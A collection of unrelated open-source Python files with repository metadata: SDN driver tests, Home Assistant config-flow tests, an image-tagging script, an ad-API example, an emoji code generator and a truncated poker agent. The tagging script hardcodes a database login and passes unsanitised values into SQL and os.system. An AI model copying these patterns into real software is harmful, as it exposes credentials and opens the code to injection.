path_1 = "/networks/%s/ports" % n
body_1 = {'id': dummy_port,
'datapath_id': p.datapath_id,
'port': str(p.port_no),
'vid': str(p.vlan_id)}
path_2 = "/networks/%s/ports/%s/attachments" % (n, dummy_port)
body_2 = {'id': p.id, 'mac': p.mac}
path_3 = "/networks/%s/ports/%s" % (n, dummy_port)
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_has_calls([
mock.call("POST", path_1, body=body_1),
mock.call("POST", path_2, body=body_2),
mock.call("DELETE", path_3)
])
port_path = "/networks/%s/ports/%s/attachments/%s" % (n, dummy_port,
p.id)
self.assertEqual(ret, port_path)
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
dummy_port = "dummy-%s" % p.id
path = "/networks/%s/ports/%s/attachments/%s" % (n, dummy_port, p.id)
self.driver.delete_port(path)
self.do_request.assert_called_once_with("DELETE", path)
class TremaMACBaseDriverTest(TremaDriverNetworkTestBase):
driver_name = "trema_mac"
def test_filter_supported(self):
self.assertFalse(self.driver.filter_supported())
def testd_create_port(self):
t, n, p = self.get_ofc_item_random_params()
net_path = "/networks/%s" % n
path = "/networks/%s/attachments" % n
body = {'id': p.id, 'mac': p.mac}
ret = self.driver.create_port(net_path, p, p.id)
self.do_request.assert_called_once_with("POST", path, body=body)
self.assertEqual(ret, '/networks/%s/attachments/%s' % (n, p.id))
def testd_delete_port(self):
t, n, p = self.get_ofc_item_random_params()
path = "/networks/%s/attachments/%s" % (n, p.id)
self.driver.delete_port(path)
self.do_request.assert_called_once_with("DELETE", path)
class TremaFilterDriverTest(TremaDriverTestBase):
def _test_create_filter(self, filter_dict=None, filter_post=None,
filter_wildcards=None, no_portinfo=False):
t, n, p = self.get_ofc_item_random_params()
src_mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
if filter_wildcards is None:
filter_wildcards = []
f = {'tenant_id': t,
'id': uuidutils.generate_uuid(),
'network_id': n,
'priority': 123,
'action': "ACCEPT",
'in_port': p.id,
'src_mac': src_mac,
'dst_mac': "",
'eth_type': 0,
'src_cidr': "",
'dst_cidr': "",
'src_port': 0,
'dst_port': 0,
'protocol': "TCP",
'admin_state_up': True,
'status': "ACTIVE"}
if filter_dict:
f.update(filter_dict)
net_path = "/networks/%s" % n
all_wildcards_ofp = ['dl_vlan', 'dl_vlan_pcp', 'nw_tos',
'in_port', 'dl_src', 'dl_dst',
'nw_src', 'nw_dst',
'dl_type', 'nw_proto',
'tp_src', 'tp_dst']
all_wildcards_non_ofp = ['in_datapath_id', 'slice']
body = {'id': f['id'],
'action': 'ALLOW',
'priority': 123,
'slice': n,
'in_datapath_id': '0x123456789',
'in_port': 1234,
'nw_proto': '0x6',
'dl_type': '0x800',
'dl_src': src_mac}
if filter_post:
body.update(filter_post)
if no_portinfo:
filter_wildcards += ['in_datapath_id', 'in_port']
p = None
for field in filter_wildcards:
if field in body:
del body[field]
ofp_wildcards = ["%s:32" % _f if _f in ['nw_src', 'nw_dst'] else _f
for _f in all_wildcards_ofp if _f not in body]
body['ofp_wildcards'] = set(ofp_wildcards)
non_ofp_wildcards = [_f for _f in all_wildcards_non_ofp
if _f not in body]
if non_ofp_wildcards:
body['wildcards'] = set(non_ofp_wildcards)
ret = self.driver.create_filter(net_path, f, p, f['id'])
# The content of 'body' is checked below.
self.do_request.assert_called_once_with("POST", "/filters",
body=mock.ANY)
self.assertEqual(ret, '/filters/%s' % f['id'])
# ofp_wildcards and wildcards in body are comma-separated
# string but the order of elements are not considered,
# so we check these fields as set.
actual_body = self.do_request.call_args[1]['body']
if 'ofp_wildcards' in actual_body:
ofp_wildcards = actual_body['ofp_wildcards'].split(',')
actual_body['ofp_wildcards'] = set(ofp_wildcards)
if 'wildcards' in actual_body:
actual_body['wildcards'] = set(actual_body['wildcards'].split(','))
self.assertEqual(body, actual_body)
def test_create_filter_accept(self):
self._test_create_filter(filter_dict={'action': 'ACCEPT'})
def test_create_filter_allow(self):
self._test_create_filter(filter_dict={'action': 'ALLOW'})
def test_create_filter_deny(self):
self._test_create_filter(filter_dict={'action': 'DENY'},
filter_post={'action': 'DENY'})
def test_create_filter_drop(self):
self._test_create_filter(filter_dict={'action': 'DROP'},
filter_post={'action': 'DENY'})
def test_create_filter_no_port(self):
self._test_create_filter(no_portinfo=True)
def test_create_filter_src_mac_wildcard(self):
self._test_create_filter(filter_dict={'src_mac': ''},
filter_wildcards=['dl_src'])
def test_create_filter_dst_mac(self):
dst_mac = ':'.join(['%x' % random.randint(0, 255) for i in xrange(6)])
self._test_create_filter(filter_dict={'dst_mac': dst_mac},
filter_post={'dl_dst': dst_mac})
def test_create_filter_src_cidr(self):
src_cidr = '10.2.0.0/24'
self._test_create_filter(filter_dict={'src_cidr': src_cidr},
filter_post={'nw_src': src_cidr})
def test_create_filter_dst_cidr(self):
dst_cidr = '192.168.10.0/24'
self._test_create_filter(filter_dict={'dst_cidr': dst_cidr},
filter_post={'nw_dst': dst_cidr})
def test_create_filter_proto_icmp(self):
self._test_create_filter(
filter_dict={'protocol': 'icmp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x1'})
def test_create_filter_proto_tcp(self):
self._test_create_filter(
filter_dict={'protocol': 'tcp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x6'})
def test_create_filter_proto_udp(self):
self._test_create_filter(
filter_dict={'protocol': 'udp'},
filter_post={'dl_type': '0x800', 'nw_proto': '0x11'})
def test_create_filter_proto_arp(self):
self._test_create_filter(
filter_dict={'protocol': 'arp'},
filter_post={'dl_type': '0x806'},
filter_wildcards=['nw_proto'])
def test_create_filter_proto_misc(self):
self._test_create_filter(
filter_dict={'protocol': '0x33', 'eth_type': '0x900'},
filter_post={'dl_type': '0x900', 'nw_proto': '0x33'})
def test_create_filter_proto_misc_dl_type_wildcard(self):
self._test_create_filter(
filter_dict={'protocol': '0x33', 'ether_type': ''},
filter_post={'nw_proto': '0x33'},
filter_wildcards=['dl_type'])
def test_create_filter_proto_wildcard(self):
self._test_create_filter(
filter_dict={'protocol': ''},
filter_wildcards=['dl_type', 'nw_proto'])
def test_create_filter_src_dst_port(self):
self._test_create_filter(filter_dict={'src_port': 8192,
'dst_port': 4096},
filter_post={'tp_src': '0x2000',
'tp_dst': '0x1000'})
def testb_delete_filter(self):
t, n, p = self.get_ofc_item_random_params()
f_path = "/filters/%s" % uuidutils.generate_uuid()
self.driver.delete_filter(f_path)
self.do_request.assert_called_once_with("DELETE", f_path)
| {
"content_hash": "af14972e6761db5b58f93bf82b9cbd9d",
"timestamp": "",
"source": "github",
"line_count": 332,
"max_line_length": 79,
"avg_line_length": 38.25301204819277,
"alnum_prop": 0.5451968503937008,
"repo_name": "zhhf/charging",
"id": "0eb219f985cf0a15f575cccafd3752f1db8440e2",
"size": "13398",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "charging/tests/unit/nec/test_trema_driver.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67930"
},
{
"name": "Python",
"bytes": "8696203"
},
{
"name": "Shell",
"bytes": "8920"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
} |
"""Define tests for the Nettigo Air Monitor config flow."""
import asyncio
from unittest.mock import patch
from nettigo_air_monitor import ApiError, AuthFailed, CannotGetMac
import pytest
from homeassistant import data_entry_flow
from homeassistant.components import zeroconf
from homeassistant.components.nam.const import DOMAIN
from homeassistant.config_entries import SOURCE_REAUTH, SOURCE_USER, SOURCE_ZEROCONF
from tests.common import MockConfigEntry
DISCOVERY_INFO = zeroconf.ZeroconfServiceInfo(
host="10.10.2.3",
hostname="mock_hostname",
name="mock_name",
port=None,
properties={},
type="mock_type",
)
VALID_CONFIG = {"host": "10.10.2.3"}
VALID_AUTH = {"username": "fake_username", "password": "fake_password"}
async def test_form_create_entry_without_auth(hass):
"""Test that the user step without auth works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == SOURCE_USER
assert result["errors"] == {}
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_CONFIG,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert len(mock_setup_entry.mock_calls) == 1
async def test_form_create_entry_with_auth(hass):
"""Test that the user step with auth works."""
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == SOURCE_USER
assert result["errors"] == {}
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_CONFIG,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert result["data"]["username"] == "fake_username"
assert result["data"]["password"] == "fake_password"
assert len(mock_setup_entry.mock_calls) == 1
async def test_reauth_successful(hass):
"""Test starting a reauthentication flow."""
entry = MockConfigEntry(
domain=DOMAIN,
title="10.10.2.3",
unique_id="aa:bb:cc:dd:ee:ff",
data={"host": "10.10.2.3"},
)
entry.add_to_hass(hass)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH, "entry_id": entry.entry_id},
data=entry.data,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input=VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_successful"
async def test_reauth_unsuccessful(hass):
"""Test starting a reauthentication flow."""
entry = MockConfigEntry(
domain=DOMAIN,
title="10.10.2.3",
unique_id="aa:bb:cc:dd:ee:ff",
data={"host": "10.10.2.3"},
)
entry.add_to_hass(hass)
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=ApiError("API Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_REAUTH, "entry_id": entry.entry_id},
data=entry.data,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "reauth_confirm"
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
user_input=VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "reauth_unsuccessful"
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(AuthFailed("Auth Error"), "invalid_auth"),
(asyncio.TimeoutError, "cannot_connect"),
(ValueError, "unknown"),
],
)
async def test_form_with_auth_errors(hass, error):
"""Test we handle errors when auth is required."""
exc, base_error = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
assert result["errors"] == {"base": base_error}
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(asyncio.TimeoutError, "cannot_connect"),
(ValueError, "unknown"),
],
)
async def test_form_errors(hass, error):
"""Test we handle errors."""
exc, base_error = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["errors"] == {"base": base_error}
async def test_form_abort(hass):
"""Test we handle abort after error."""
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
side_effect=CannotGetMac("Cannot get MAC address from device"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "device_unsupported"
async def test_form_with_auth_abort(hass):
"""Test we handle abort after error."""
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
context={"source": SOURCE_USER},
data=VALID_CONFIG,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
side_effect=CannotGetMac("Cannot get MAC address from device"),
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "device_unsupported"
async def test_form_already_configured(hass):
"""Test that errors are shown when duplicates are added."""
entry = MockConfigEntry(
domain=DOMAIN, unique_id="aa:bb:cc:dd:ee:ff", data=VALID_CONFIG
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN, context={"source": SOURCE_USER}
)
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{"host": "1.1.1.1"},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
# Test config entry got updated with latest IP
assert entry.data["host"] == "1.1.1.1"
async def test_zeroconf(hass):
"""Test we get the form."""
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
context = next(
flow["context"]
for flow in hass.config_entries.flow.async_progress()
if flow["flow_id"] == result["flow_id"]
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["errors"] == {}
assert context["title_placeholders"]["host"] == "10.10.2.3"
assert context["confirm_only"] is True
with patch(
"homeassistant.components.nam.async_setup_entry",
return_value=True,
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
{},
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"] == {"host": "10.10.2.3"}
assert len(mock_setup_entry.mock_calls) == 1
async def test_zeroconf_with_auth(hass):
"""Test that the zeroconf step with auth works."""
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=AuthFailed("Auth Error"),
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
context = next(
flow["context"]
for flow in hass.config_entries.flow.async_progress()
if flow["flow_id"] == result["flow_id"]
)
assert result["type"] == data_entry_flow.RESULT_TYPE_FORM
assert result["step_id"] == "credentials"
assert result["errors"] == {}
assert context["title_placeholders"]["host"] == "10.10.2.3"
with patch("homeassistant.components.nam.NettigoAirMonitor.initialize"), patch(
"homeassistant.components.nam.NettigoAirMonitor.async_get_mac_address",
return_value="aa:bb:cc:dd:ee:ff",
), patch(
"homeassistant.components.nam.async_setup_entry", return_value=True
) as mock_setup_entry:
result = await hass.config_entries.flow.async_configure(
result["flow_id"],
VALID_AUTH,
)
await hass.async_block_till_done()
assert result["type"] == data_entry_flow.RESULT_TYPE_CREATE_ENTRY
assert result["title"] == "10.10.2.3"
assert result["data"]["host"] == "10.10.2.3"
assert result["data"]["username"] == "fake_username"
assert result["data"]["password"] == "fake_password"
assert len(mock_setup_entry.mock_calls) == 1
async def test_zeroconf_host_already_configured(hass):
"""Test that errors are shown when host is already configured."""
entry = MockConfigEntry(
domain=DOMAIN, unique_id="aa:bb:cc:dd:ee:ff", data=VALID_CONFIG
)
entry.add_to_hass(hass)
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == "already_configured"
@pytest.mark.parametrize(
"error",
[
(ApiError("API Error"), "cannot_connect"),
(CannotGetMac("Cannot get MAC address from device"), "device_unsupported"),
],
)
async def test_zeroconf_errors(hass, error):
"""Test we handle errors."""
exc, reason = error
with patch(
"homeassistant.components.nam.NettigoAirMonitor.initialize",
side_effect=exc,
):
result = await hass.config_entries.flow.async_init(
DOMAIN,
data=DISCOVERY_INFO,
context={"source": SOURCE_ZEROCONF},
)
assert result["type"] == data_entry_flow.RESULT_TYPE_ABORT
assert result["reason"] == reason
| {
"content_hash": "aa6bdc1a9c3ceee01b00abf3132be5e7",
"timestamp": "",
"source": "github",
"line_count": 411,
"max_line_length": 84,
"avg_line_length": 33.80778588807786,
"alnum_prop": 0.6251889168765743,
"repo_name": "jawilson/home-assistant",
"id": "015c645a3e776a54b9053ff93b33e937e8e29ca7",
"size": "13895",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/components/nam/test_config_flow.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2782"
},
{
"name": "Python",
"bytes": "40129467"
},
{
"name": "Shell",
"bytes": "4910"
}
],
"symlink_target": ""
} |
"""
Created on Fri Oct 18 14:48:56 2014
@author: jb
"""
def sqlQueryMetatags(style,f):
import sqlalchemy
orcl_engine = sqlalchemy.create_engine('oracle+cx_oracle://jbragato:[email protected]:1531/dssprd1')
connection = orcl_engine.connect()
querymake_metatags="""SELECT DISTINCT
POMGR_SNP.PRODUCT_COLOR.ID AS colorstyle,
POMGR_SNP.BRAND.NAME AS brand,
POMGR_SNP.COLOR_GROUP.DESCRIPTION AS color_group,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.LABEL AS category_parent,
POMGR_SNP.PRODUCT_FOLDER.LABEL AS category_sub,
MAX(ATG_SNP.EVENT.ID) AS event_id,
ATG_SNP.EVENT.EVENT_DESCRIPTION AS event_title,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.PATH AS product_path,
ATG_SNP.EVENT.SHOT_LIST_DATE AS shot_list_dt,
ATG_SNP.EVENT.BRAND_EDITORIAL AS brand_editorial,
ATG_SNP.EVENT.CATEGORY AS cat_id,
POMGR_SNP.PRODUCT_COLOR.VENDOR_STYLE AS vendor_style,
POMGR_SNP.LK_PRODUCT_STATUS.NAME AS production_status
FROM
POMGR_SNP.PRODUCT_COLOR
LEFT JOIN ATG_SNP.EVENT_PRODUCT_COLOR
ON
POMGR_SNP.PRODUCT_COLOR.ID = ATG_SNP.EVENT_PRODUCT_COLOR.PRODUCT_COLOR_ID
LEFT JOIN POMGR_SNP.LK_PRODUCT_STATUS
ON
POMGR_SNP.PRODUCT_COLOR.PRODUCTION_STATUS_ID = POMGR_SNP.LK_PRODUCT_STATUS.ID
LEFT JOIN ATG_SNP.EVENT
ON
ATG_SNP.EVENT_PRODUCT_COLOR.EVENT_ID = ATG_SNP.EVENT.ID
LEFT JOIN POMGR_SNP.PRODUCT
ON
POMGR_SNP.PRODUCT_COLOR.PRODUCT_ID = POMGR_SNP.PRODUCT.ID
LEFT JOIN POMGR_SNP.PRODUCT_FOLDER
ON
POMGR_SNP.PRODUCT.PRODUCT_FOLDER_ID = POMGR_SNP.PRODUCT_FOLDER.ID
LEFT JOIN POMGR_SNP.BRAND
ON
POMGR_SNP.PRODUCT.BRAND_ID = POMGR_SNP.BRAND.ID
LEFT JOIN POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED
ON
POMGR_SNP.PRODUCT_FOLDER.PARENT_PRODUCT_FOLDER_ID =
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.ID
LEFT JOIN POMGR_SNP.COLOR_GROUP
ON
POMGR_SNP.PRODUCT_COLOR.COLOR_GROUP_ID = POMGR_SNP.COLOR_GROUP.ID
WHERE
POMGR_SNP.PRODUCT_COLOR.ID = COLORSTYLESEARCH
GROUP BY
POMGR_SNP.PRODUCT_COLOR.ID,
POMGR_SNP.BRAND.NAME,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.LABEL,
POMGR_SNP.PRODUCT_FOLDER.LABEL,
ATG_SNP.EVENT.EVENT_DESCRIPTION,
POMGR_SNP.COLOR_GROUP.DESCRIPTION,
POMGR_SNP.PRODUCT_FOLDER_DENORMALIZED.PATH,
POMGR_SNP.PRODUCT_COLOR.VENDOR_STYLE,
ATG_SNP.EVENT.SHOT_LIST_DATE,
ATG_SNP.EVENT.BRAND_EDITORIAL,
ATG_SNP.EVENT.CATEGORY,
POMGR_SNP.LK_PRODUCT_STATUS.NAME
ORDER BY
POMGR_SNP.PRODUCT_COLOR.ID DESC"""
## --POMGR_SNP.PRODUCT_COLOR.MODIFIED_DATE >= TRUNC(SysDate - 365)
## --RENAME INPUT VARIABLE PRIOR TO QUERY
querymake_metatags = querymake_metatags.replace('COLORSTYLESEARCH', str(style))
result = connection.execute(querymake_metatags)
metatags = {}
for row in result:
if row:
metatag = {}
# metatag['colorstyle'] = row['colorstyle']
# metatag['IPTC:PONumber'] = row['po_num']
metatag['IPTC:VendorStyle'] = row['vendor_style']
metatag['IPTC:Brand'] = row['brand']
metatag['XMP:Genre'] = row['color_group']
metatag['IPTC:ProductType'] = row['category_sub']
metatag['EventID'] = row['event_id']
try:
metatag['XMP:Album'] = "EventID " + str(row['event_id'])
except:
pass
metatag['IPTC:Credit'] = row['product_path']
metatag['IPTC:CopyrightNotice'] = row['brand']
metatag['IPTC:SpecialInstructions'] = row['production_status']
metatag['Keywords'] = row['category_parent']
metatag['IPTC:Source'] = row['shot_list_dt']
# metatag['IPTC:SpecialInstructions'] = '{:%Y-%m-%d}'.format(metatag['brand_editorial'])
# metatag['IPTC:SampleStatusDate'] = '{:%Y-%m-%d}'.format(row['sample_dt'])
# metatag['IPTC:Source'] = '{:%Y-%m-%d}'.format(row['sample_dt'])
# metatag['IPTC:Source'] = row['sample_dt']
# metatag['SourceFile'] = f
## file path as dict KEY
metatags[f] = metatag
## colorstyle as dict KEY
#metatags[row['colorstyle']] = metatag
else:
pass
connection.close()
return metatags
def get_dbinfo_for_metatags_singlefile(f):
import os
metafield_dict = {}
listed = []
stylefile = os.path.basename(f)
style = stylefile.split('_')[0]
#print style, f
### string = key/val as k=filepath, val=all metadata as k/v pairs
exiftoolstring = sqlQueryMetatags(style,f)
#pairs = zip(exiftoolstring.values(), exiftoolstring.keys())
for k,v in exiftoolstring.iteritems():
tmpd = {}
for val in v:
tmpd[val] = v[val]
listed.append(tmpd)
metafield_dict[k] = tmpd
return metafield_dict
#return listed
##################### Begin CMDS ##############
def main(filename=None):
import sys, os, glob, sqlalchemy
if not filename:
filename=os.path.abspath(sys.argv[1])
metadict = get_dbinfo_for_metatags_singlefile(filename)
exiftags = []
exifdict = {}
for k,v in metadict.items():
metatags = []
for val in v:
filename = str(k)
exiftag = val
exifvalue = v[val]
exifpart = "-'{exiftag}'='{exifvalue}'".format(exiftag=exiftag,exifvalue=exifvalue)
metatags.append(exifpart)
exifdict[filename] = " ".join(metatags)
execlist = []
for key,value in exifdict.iteritems():
execstring = "exiftool -m -overwrite_original_in_place -fast2 -q {0} {1}".format(value,key)
execlist.append(execstring)
for line in execlist:
try:
os.system(line)
print line
except:
pass
if __name__ == '__main__':
main()
#print execlist
#print exifdict
#
#
# except KeyError:
# continue
# except sqlalchemy.exc.DatabaseError:
# continue
# print "DBERR" + f
| {
"content_hash": "0a15aefcb802846e98c444c2b5aa3d76",
"timestamp": "",
"source": "github",
"line_count": 182,
"max_line_length": 108,
"avg_line_length": 34.52197802197802,
"alnum_prop": 0.5976444373706828,
"repo_name": "relic7/prodimages",
"id": "b359b78ddbe2f18a4ba68aa55a25401e53fba0cc",
"size": "6675",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/jbmodules/image_metadata/mtags_singleFileNewMaps.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "16783"
},
{
"name": "HTML",
"bytes": "88323"
},
{
"name": "JavaScript",
"bytes": "158855"
},
{
"name": "PHP",
"bytes": "70412"
},
{
"name": "PLSQL",
"bytes": "72767"
},
{
"name": "Perl",
"bytes": "7143"
},
{
"name": "Python",
"bytes": "4922301"
},
{
"name": "Shell",
"bytes": "423422"
},
{
"name": "Smarty",
"bytes": "571"
},
{
"name": "VimL",
"bytes": "6045"
}
],
"symlink_target": ""
} |
"""This code example gets an order by its id. To determine which orders exist,
run get_all_orders.py."""
__author__ = '[email protected] (Jeff Sham)'
# Locate the client library. If module was installed via "setup.py" script, then
# the following two lines are not needed.
import os
import sys
sys.path.insert(0, os.path.join('..', '..', '..', '..'))
# Import appropriate classes from the client library.
from adspygoogle import DfpClient
# Initialize client object.
client = DfpClient(path=os.path.join('..', '..', '..', '..'))
# Initialize appropriate service.
order_service = client.GetService(
'OrderService', 'https://www.google.com', 'v201203')
# Set the id of the order to get.
order_id = 'INSERT_ORDER_ID_HERE'
# Get order.
order = order_service.GetOrder(order_id)[0]
# Display results.
print ('Order with id \'%s\', name \'%s\', and advertiser id \'%s\' was '
'found.' % (order['id'], order['name'], order['advertiserId']))
| {
"content_hash": "cf7e05927cef9d4dc975026a14231625",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 80,
"avg_line_length": 30.903225806451612,
"alnum_prop": 0.6711899791231732,
"repo_name": "krux/adspygoogle",
"id": "5f560eacee03de1684605358798ab6d4d72e5eaf",
"size": "1576",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "examples/adspygoogle/dfp/v201203/get_order.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "10581"
},
{
"name": "Python",
"bytes": "2263332"
}
],
"symlink_target": ""
} |
#!/usr/bin/env python3
# -*- coding: utf-8; -*-
# This is autogenerated python file DO NOT try to edit
/* [[[cog
import cog
import json
json_package_path = './emoji.json'
data_dict = json.loads(open(json_package_path).read())
unicode_replace = {}
shortcode_replace = {}
ascii_replace = {}
for key, value in data_dict.items():
unicode_hex = value['unicode']
ascii_list = value['aliases_ascii']
shortname = value['shortname']
for ascii in ascii_list:
ascii_replace[ascii] = unicode_hex
shortcode_replace[shortname] = unicode_hex
if '-' not in unicode_hex:
unicode_char = chr(int(unicode_hex, 16))
unicode_replace[unicode_char.encode('utf-8')] = shortname
else:
parts = unicode_hex.split('-')
unicode_char = ''.join(chr(int(part, 16)) for part in parts)
unicode_replace[unicode_char.encode('utf-8')] = shortname
print(unicode_replace)
print(shortcode_replace)
print(ascii_replace)
cog.out('unicode_replace = %s\n\n' % unicode_replace)
cog.out('shortcode_replace = %s\n\n' % shortcode_replace)
cog.out('ascii_replace = %s\n\n' % ascii_replace)
]]] */
//[[[end]]]
| {
"content_hash": "555e9f36df84e00e5370d001f2f04499",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 68,
"avg_line_length": 27.878048780487806,
"alnum_prop": 0.6517935258092739,
"repo_name": "launchyard/emojipy",
"id": "e52dbf75175ce5df7956c505e2f4356160379cda",
"size": "1143",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emojipy/create_ruleset.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "248425"
},
{
"name": "HTML",
"bytes": "595"
},
{
"name": "Python",
"bytes": "151290"
}
],
"symlink_target": ""
} |
import roomai.games.common
from roomai.games.common.AbstractPlayer import AbstractPlayer
from roomai.models.algorithms import AbstractA3C
logger = roomai.get_logger()
import numpy as np
class Texasholdem_A3CPlayer(AbstractPlayer):
def __init__(self, state_spec, n_a):
self.state_spec = state_spec
self.n_a= n_a
self.action_dict = {"Fold":0, "Check":1, "Call":2, "Raise":3, "Allin":4}
def load_model(self, model_path, model_name):
self.a3c = AbstractA3C(self.state_spec, self.n_a)
self.a3c.load_model(model_path, model_name)
def receive_info(self, info):
self.s = np.zeros((14, 8, 1))
if (info.public_state_history[-1].param_dealer_id == info.person_state_history[-1].id):
for card in info.public_state_history[-1].public_cards:
self.s[card.point_rank, card.suit_rank, 0] = 1
for card in info.person_state_history[-1].hand_cards:
self.s[card.point_rank, card.suit_rank, 0] = 1
else:
for card in info.public_state_history[-1].public_cards:
